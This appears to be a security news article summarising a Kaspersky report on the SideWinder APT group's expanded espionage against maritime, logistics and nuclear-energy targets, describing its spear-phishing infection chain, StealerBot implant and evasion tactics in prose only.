do son 
Infection flow | Image: Kaspersky Labs
The SideWinder Advanced Persistent Threat (APT) group has expanded its cyber-espionage operations, targeting the maritime and nuclear sectors with an evolved malware arsenal and enhanced persistence techniques. According to a new report from Kaspersky Labs, the group has been aggressively broadening its operations, particularly in South and Southeast Asia, the Middle East, and Africa.
Kaspersky researchers have been tracking SideWinder’s activities throughout 2024 and observed an increasing number of attacks on maritime infrastructures and logistics companies. The group also demonstrated a heightened interest in nuclear power plants and energy-related institutions.
“We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems,” the report states.
While SideWinder’s historical targets have included government and military entities in Pakistan, Sri Lanka, China, and Nepal, their recent operations suggest a broader strategic interest in critical industries.
SideWinder is constantly refining its attack methodologies to stay ahead of security software. Kaspersky’s analysis reveals that the group:
- Rapidly modifies its malware once detected, often deploying new versions within five hours.
- Employs sophisticated persistence mechanisms, including modifying file paths, renaming malicious files, and evading sandbox detections.
- Adapts behavioral tactics in response to detection, engaging in a “ping-pong” game with cybersecurity researchers.
SideWinder relies on spear-phishing as its primary infection vector. The group delivers malicious DOCX files that exploit the CVE-2017-11882 vulnerability, an old but effective flaw in Microsoft Office’s Equation Editor. The infection chain includes:
- A remote template injection attack, downloading a weaponized RTF document.
- Execution of malicious shellcode, leading to the installation of the Backdoor Loader.
- Deployment of “StealerBot”, an exclusive post-exploitation toolkit.
The lure documents appear legitimate, often related to:
- Nuclear power plants and energy agencies.
- Maritime authorities and logistics infrastructure.
- Governmental and diplomatic entities.
The Backdoor Loader acts as a foothold for the StealerBot implant, which facilitates:
- Data exfiltration and espionage.
- Network reconnaissance and privilege escalation.
- Persistence within compromised infrastructures.
To further avoid detection, SideWinder employs a JavaScript loader, which:
- Runs in two stages, checking RAM size and installed security software before proceeding.
- Uses the mshta.exe Windows utility to retrieve payloads from a remote attacker-controlled server.
- Embeds heavily obfuscated JavaScript code, making analysis difficult.
While SideWinder has previously attacked government and military entities, their recent focus on maritime and nuclear infrastructure highlights a shift towards critical industries.
“We noticed a new and significant increase in attacks against maritime infrastructures and logistics companies… We observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia,” the report concludes.
Related Posts:
- Report: 50,000 ships worldwide can be hacked
- Russian nuclear weapons scientists arrested for using supercomputer to mine Bitcoins
- DONOT APT Group Targets Pakistan’s Maritime and Defense Sectors in New Campaign
- SideWinder APT Group Sets Sights on Ports and Maritime Facilities in Espionage Campaign
- Resecurity: Nuclear energy, oil and gas are top targets for ransomware groups in 2024
